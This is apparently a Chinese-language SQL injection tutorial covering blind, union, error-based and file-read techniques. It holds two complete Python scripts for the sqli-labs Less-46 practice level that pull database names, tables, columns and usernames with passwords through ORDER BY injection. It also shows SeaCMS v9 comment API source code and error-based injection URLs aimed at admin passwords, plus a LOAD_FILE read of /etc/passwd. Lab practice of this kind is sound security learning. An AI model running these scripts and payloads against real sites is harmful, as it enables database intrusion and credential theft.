seacmsv9注入管理员账号密码+orderby+limi
1:mysql默认存储引擎innoDB携带的表
1,mysql.innodb_table_stats
2,mysql.innodb_index_stats
SELECT table_name FROM mysql.innodb_table_stats WHERE database_name = DATABASE();2: 关键字做处理
- HEX编码:0x696E666F726D6174696F6E5F736368656D61
- 字符串:concat('informa','tion_scheam')
- 大小写:INforMation_Scheam
3:时间盲注
SELECT IF(ASCII(SUBSTRING(DATABASE(), 1, 1)) = 97, SLEEP(5), 0);如果条件为真,数据库将延迟5秒才返回结果,否则立即返回。通过调整不同的字符和条件,你可以逐渐拼凑出表名(可使用python脚本破解)
4:布尔盲注(python脚本)
SELECT CASE WHEN (SELECT SUBSTRING(mysql.innodb_table_stats, 1, 1) FROM your_table LIMIT 1) = 'a' THEN 1/0 ELSE 1 END;5:利用联合查询
SELECT id, name FROM users WHERE id = 1 UNION SELECT table_name, '' FROM your_table;6:文件读取:
某些数据库允许从文件系统中读取文件内容,假设你想读取 /etc/passwd 文件的内容:
SELECT LOAD_FILE('/etc/passwd');7:以靶场第46关为例子
用Boolean盲注:
-
import requests -
from lxml import html -
def get_id_one(URL,paload): -
res = requests.get(url=URL,params=paload) -
tree = html.fromstring(res.content) -
id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip() -
return id_one -
def get_database(URL): -
# 获取数据库名称 -
s = "" -
for i in range(1,10): -
low = 32 -
hight = 128 -
mid = (low+hight)//2 -
while(hight > low): -
paload = {"sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),id,username) -- "}#相当于第一个字符<={mid}条件判断为真 -
id_one = get_id_one(URL,paload) -
if id_one=="1": -
hight = mid -
mid = (low + hight) // 2 -
else: -
low = mid +1 -
mid = (low + hight) // 2 -
s+=chr(mid) -
print("数据库名称:"+s) -
def get_table(URL): -
# 获取表名称 -
s = "" -
for i in range(1,32): -
low = 32 -
hight = 128 -
mid = (low+hight)//2 -
while(hight > low): -
paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),id,username) -- "} -
id_one = get_id_one(URL,paload) -
if id_one=="1": -
low = mid +1 -
mid = (low + hight) // 2 -
else: -
hight = mid -
mid = (low + hight) // 2 -
s+=chr(mid) -
print("表的名称:"+s) -
def get_column(URL): -
# 获取管理员的字段名称 -
s = "" -
for i in range(1,32): -
low = 32 -
hight = 128 -
mid = (low+hight)//2 -
while(hight > low): -
paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),id,username) -- "} -
id_one = get_id_one(URL,paload) -
if id_one=="1": -
low = mid +1 -
mid = (low + hight) // 2 -
else: -
hight = mid -
mid = (low + hight) // 2 -
s+=chr(mid) -
print("列的名称:"+s) -
def get_result(URl): -
# 获取用户名和密码信息 -
s = "" -
for i in range(1,32): -
low = 32 -
hight = 128 -
mid = (low+hight)//2 -
while(hight > low): -
paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),id,username) -- "} -
id_one = get_id_one(URL,paload) -
if id_one=="1": -
low = mid +1 -
mid = (low + hight) // 2 -
else: -
hight = mid -
mid = (low + hight) // 2 -
s+=chr(mid) -
print("用户名及密码信息:"+s) -
if __name__ == '__main__': -
URL = "http://localhost/Less-46/" -
# get_database(URL) -
# get_table(URL) -
# get_column(URL) -
get_result(URL)
用时间盲注:
-
import requests -
import datetime -
def get_database(URL): -
# 获取数据库名称 -
s = "" -
for i in range(1,10): -
low = 32 -
hight = 128 -
mid = (low+hight)//2 -
while(hight > low): -
paload = {"sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(0.2),id) -- "}#相当于第一个字符<={mid}条件判断为真 -
start = datetime.datetime.now() -
res = requests.get(url=URL, params=paload) -
end = datetime.datetime.now() -
if (end - start).seconds >=3: -
hight = mid -
mid = (low + hight) // 2 -
else: -
low = mid +1 -
mid = (low + hight) // 2 -
print(chr(mid),mid) -
s+=chr(mid) -
print("数据库名称:"+s) -
def get_table(URL): -
# 获取表名称 -
s = "" -
for i in range(1,32): -
low = 32 -
hight = 128 -
mid = (low+hight)//2 -
while(hight > low): -
paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(0.2),id) -- "} -
start = datetime.datetime.now() -
res = requests.get(url=URL, params=paload) -
end = datetime.datetime.now() -
if (end - start).seconds >=3: -
low = mid +1 -
mid = (low + hight) // 2 -
else: -
hight = mid -
mid = (low + hight) // 2 -
s+=chr(mid) -
print("表的名称:"+s) -
def get_column(URL): -
# 获取管理员的字段名称 -
s = "" -
for i in range(1,32): -
low = 32 -
hight = 128 -
mid = (low+hight)//2 -
while(hight > low): -
paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(0.2),id) -- "} -
start = datetime.datetime.now() -
res = requests.get(url=URL, params=paload) -
end = datetime.datetime.now() -
if (end - start).seconds >=3: -
low = mid +1 -
mid = (low + hight) // 2 -
else: -
hight = mid -
mid = (low + hight) // 2 -
s+=chr(mid) -
print("列的名称:"+s) -
def get_result(URl): -
# 获取用户名和密码信息 -
s = "" -
for i in range(1,32): -
low = 32 -
hight = 128 -
mid = (low+hight)//2 -
while(hight > low): -
paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(0.2),1) -- "} -
start = datetime.datetime.now() -
res = requests.get(url=URL, params=paload) -
end = datetime.datetime.now() -
if (end - start).seconds >=3: -
low = mid +1 -
mid = (low + hight) // 2 -
else: -
hight = mid -
mid = (low + hight) // 2 -
s+=chr(mid) -
print("用户名及密码信息:"+s) -
if __name__ == '__main__': -
URL = "http://localhost/Less-46/" -
# get_database(URL) -
# get_table(URL) -
# get_column(URL) -
get_result(URL)
8:seacmsv9实现报错注入数据:
-
<?php
-
session_start();
-
require_once("../../include/common.php");
-
$id = (isset($gid) && is_numeric($gid)) ? $gid : 0;
-
$page = (isset($page) && is_numeric($page)) ? $page : 1;
-
$type = (isset($type) && is_numeric($type)) ? $type : 1;
-
$pCount = 0;
-
$jsoncachefile = sea_DATA."/cache/review/$type/$id.js";
-
//缓存第一页的评论
-
if($page<2)
-
{
-
if(file_exists($jsoncachefile))
-
{
-
$json=LoadFile($jsoncachefile);
-
die($json);
-
}
-
}
-
$h = ReadData($id,$page);
-
$rlist = array();
-
if($page<2)
-
{
-
createTextFile($h,$jsoncachefile);
-
}
-
die($h);
-
function ReadData($id,$page)
-
{
-
global $type,$pCount,$rlist;
-
$ret = array("","",$page,0,10,$type,$id);
-
if($id>0)
-
{
-
$ret[0] = Readmlist($id,$page,$ret[4]);
-
$ret[3] = $pCount;
-
$x = implode(',',$rlist);
-
if(!empty($x))
-
{
-
$ret[1] = Readrlist($x,1,10000);
-
}
-
}
-
$readData = FormatJson($ret);
-
return $readData;
-
}
-
function Readmlist($id,$page,$size)
-
{
-
global $dsql,$type,$pCount,$rlist;
-
$ml=array();
-
if($id>0)
-
{
-
$sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";
-
$rs = $dsql ->GetOne($sqlCount);
-
$pCount = ceil($rs['dd']/$size);
-
$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";
-
$dsql->setQuery($sql);
-
$dsql->Execute('commentmlist');
-
while($row=$dsql->GetArray('commentmlist'))
-
{
-
$row['reply'].=ReadReplyID($id,$row['reply'],$rlist);
-
$ml[]="{\"cmid\":".$row['id'].",\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".date("Y/n/j H:i:s",$row['dtime'])."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";
-
}
-
}
-
$readmlist=join($ml,",");
-
return $readmlist;
-
}
-
function Readrlist($ids,$page,$size)
-
{
-
global $dsql,$type;
-
$rl=array();
-
$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";
-
$dsql->setQuery($sql);
-
$dsql->Execute('commentrlist');
-
while($row=$dsql->GetArray('commentrlist'))
-
{
-
$rl[]="\"".$row['id']."\":{\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".$row['dtime']."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";
-
}
-
$readrlist=join($rl,",");
-
return $readrlist;
-
}
-
function ReadReplyID($gid,$cmid,&$rlist)
-
{
-
global $dsql;
-
if($cmid>0)
-
{
-
if(!in_array($cmid,$rlist))$rlist[]=$cmid;
-
$row = $dsql->GetOne("SELECT reply FROM sea_comment WHERE id=$cmid limit 0,1");
-
if(is_array($row))
-
{
-
$ReplyID = ",".$row['reply'].ReadReplyID($gid,$row['reply'],$rlist);
-
}else
-
{
-
$ReplyID = "";
-
}
-
}else
-
{
-
$ReplyID = "";
-
}
-
return $ReplyID;
-
}
-
function FormatJson($json)
-
{
-
$x = "{\"mlist\":[%0%],\"rlist\":{%1%},\"page\":{\"page\":%2%,\"count\":%3%,\"size\":%4%,\"type\":%5%,\"id\":%6%}}";
-
for($i=6;$i>=0;$i--)
-
{
-
$x=str_replace("%".$i."%",$json[$i],$x);
-
}
-
$formatJson = jsonescape($x);
-
return $formatJson;
-
}
-
function jsonescape($txt)
-
{
-
$jsonescape=str_replace(chr(13),"",str_replace(chr(10),"",json_decode(str_replace("%u","\u",json_encode("".$txt)))));
-
return $jsonescape;
-
}
输入以下sql注入:
http://127.0.0.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`', extractvalue(1, concat_ws( , \, (select user()))),@`'
但输入以下:
http://127.0.0.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27` 
说明注入失败